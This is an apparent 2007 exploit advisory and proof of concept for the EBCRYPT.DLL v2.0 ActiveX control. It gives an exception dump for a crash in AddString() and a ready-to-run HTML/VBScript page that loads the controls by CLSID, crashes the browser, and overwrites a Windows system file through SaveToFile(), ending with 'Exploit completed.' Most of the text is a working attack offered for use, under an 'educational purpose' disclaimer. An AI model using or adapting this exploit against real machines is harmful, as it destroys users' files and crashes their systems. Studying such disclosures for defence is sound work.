ebdesign-remote.txt
Posted on 25 September 2007
<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>EB Design Pty Ltd (EBCRYPT.DLL v.2.0) Multiple Remote Vulnerabilites</b> url: http://www.ebcrypt.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 <b>Marked as: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller, data KillBitSet: False</b> This control contains two vulnerabilities: 1) It is possible to cause a DoS passing at least one character to "AddString()" method. This is a dump of exception: Access violation when reading [3A433B2E] 03158CA4 FF51 10 => CALL DWORD PTR DS:[ECX+10] <-- crash ECX 3A433B2E <-- ".;C:" (is a part of path) 2) It is possible to overwrite a file passed as argument to "SaveToFile()" method ----------------------------------------------------------------------------- <object classid='clsid:3C34EAC7-9904-4415-BBE4-82AA8C0C0BE8' id='test1'></object> <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test2'></object> <input language=VBScript onclick=tryAddString() type=button value='Click here to start AddString test '> <input language=VBScript onclick=trySaveToFile() type=button value='Click here to start SaveToFile test'> <script language='vbscript'> Sub tryAddString test1.AddString "A" End Sub Sub trySaveToFile test2.SaveToFile "C:WINDOWSsystem_.ini" MsgBox "Exploit completed." End Sub </script> </span></span> </code></pre>